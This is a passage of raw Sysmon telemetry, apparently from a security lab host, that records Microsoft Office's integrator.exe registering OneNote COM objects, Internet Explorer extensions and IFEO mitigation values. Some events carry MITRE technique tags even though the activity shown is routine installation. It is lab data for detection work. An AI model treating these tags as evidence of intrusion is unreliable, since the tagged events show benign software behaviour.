Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}DWORD (0x00000000) 13241300x800000000000000072026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{48E73304-E1D6-4330-914C-F5F514E3486C}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll 13241300x800000000000000072025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{10336656-40D7-4530-BCC0-86CD3D77D25F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{68CED213-317D-3F27-9036-A33240DA522E}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000072023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{1227B818-7298-3D68-AC55-DDDA56EE56E1}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000072022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{07B06095-5687-4D13-9E32-12B4259C9813}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000072021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{CDEC13B2-0B3C-400E-B909-E27EE89C6799}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{E18FEC31-2EA1-49A2-A7A6-902DC0D1FF05}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.266{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9800F18F-3D86-4744-A7D0-540989C86D7B}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{9800F18F-3D86-4744-A7D0-540989C86D7B}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3B0BD075-929C-4E52-AAD1-458C81A10B24}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{3B0BD075-929C-4E52-AAD1-458C81A10B24}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9ED13477-E909-45BC-BADC-2106D04D6BD7}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{9ED13477-E909-45BC-BADC-2106D04D6BD7}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.251{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{BDEADEF5-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{BDEADEF5-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{BDEADE9E-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3FD37ABB-F90A-4DE5-AA38-179629E64C2F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{3FD37ABB-F90A-4DE5-AA38-179629E64C2F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{62B4D041-4667-40B6-BB50-4BC0A5043A73}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{62B4D041-4667-40B6-BB50-4BC0A5043A73}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.235{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9203C2CB-1DC1-482D-967E-597AFF270F0D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000072005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.219{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{9203C2CB-1DC1-482D-967E-597AFF270F0D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.219{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{E7339A62-0E31-4A5E-BA3D-F2FEDFBF8BE5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000072003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:56.219{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msohtmed.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 23542300x800000000000000072002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.204{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=F476B506A4BA0A76A2FC305C3E05E39C,SHA256=095B04347087DB3EDB11D88042FDDCC89B0F352AAEC556B074C35B48B3EB8D3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=619F8831A47E4258AA7C4E3D0B8B0541,SHA256=064C7B1CE85D94C770ED795315B159BF496BE1B09721BD41F762B921217201D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=CAE1F563C0BB9B4F987B89768E96736B,SHA256=859BD912BBF46BE370FB5E8AA36F38B9F168A469CF360CC5CCAFDE234257618B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000071999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}Microsoft OneNote Namespace Extension for Windows Desktop Search 13241300x800000000000000071998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.173{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\ONFILTER.DLL 13241300x800000000000000071997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.173{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{6EE84065-8BA3-4a8a-9542-6EC8B56A3378}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\ONFILTER.DLL 13241300x800000000000000071996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.173{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{C7DFFDF1-BD1F-450A-B98D-96B6D30BA4C1}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\ONFILTER.DLL 13241300x800000000000000071995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E2F5480E-ED5A-4DDE-B8A8-F9F297479F62}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4693FF15-B962-420A-9E5D-176F7D4B8321}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9FBC2D8F-6F52-4CFA-A86F-096F3E9EB4B2}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\ODFFILT.DLL 13241300x800000000000000071992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{20E823C2-62F3-4638-96BD-90F4F6784EBC}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{312AB530-ECC9-496E-AE0E-C9E6C5392499}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F90DFE0C-CBDF-41FF-8598-EDD8F222A2C8}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{DDFE337F-4987-4EC8-BDE3-133FA63D5D85}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5A98B233-3C59-4B31-944C-0E560D85E6C3}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\OFFFILTX.DLL 13241300x800000000000000071987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{4039B326-9F27-4B4A-B460-47A0C6A39D5C}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Filters\MSGFILT.DLL 13241300x800000000000000071986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ClsidExtension{FFFDC614-B694-4AE6-AB38-5D6374584B52} 13241300x800000000000000071985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\CLSID{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} 13241300x800000000000000071984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\IconC:\Program Files\Microsoft Office\root\Office16\ONBttnIELinkedNotes.dll,103 13241300x800000000000000071983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\HotIconC:\Program Files\Microsoft Office\root\Office16\ONBttnIELinkedNotes.dll,103 13241300x800000000000000071982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ToolTipOneNote Linked Notes 13241300x800000000000000071981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuTextOneNote Lin&ked Notes 13241300x800000000000000071980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ButtonTextOneNote Lin&ked Notes 13241300x800000000000000071979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Default VisibleYes 13241300x800000000000000071978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}DWORD (0x00000000) 13241300x800000000000000071977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.157{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{FFFDC614-B694-4AE6-AB38-5D6374584B52}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\ONBttnIELinkedNotes.dll 23542300x800000000000000071976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.157{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CCD9ADA5C25DC6B35C6274A230B91B1,SHA256=0113771702940D8DE59926FAB52C872B89F2FF289857A667DDC329A37AEF8C07,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000071975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.141{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ClsidExtension{48E73304-E1D6-4330-914C-F5F514E3486C} 13241300x800000000000000071974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\CLSID{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} 13241300x800000000000000071973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\IconC:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll,103 13241300x800000000000000071972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\HotIconC:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll,103 13241300x800000000000000071971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ToolTipSend to OneNote 13241300x800000000000000071970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuTextSe&nd to OneNote 13241300x800000000000000071969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ButtonTextSend to OneNote 13241300x800000000000000071968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Default VisibleYes 13241300x800000000000000071967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}DWORD (0x00000000) 13241300x800000000000000071966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.126{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{48E73304-E1D6-4330-914C-F5F514E3486C}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll 13241300x800000000000000071965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:56.110{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenotem.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:56.110{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenote.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 23542300x800000000000000071963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.094{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=28BE42651DBD1A4FFF59A5182C9E8E19,SHA256=5E4E80F3F60927EC7D88783863EC7ECC5CF60EBAAA54CB525CE8D2270665900B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000071962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:55:56.094{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack20162021-04-20 14:55:56.094 10341000x800000000000000071961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 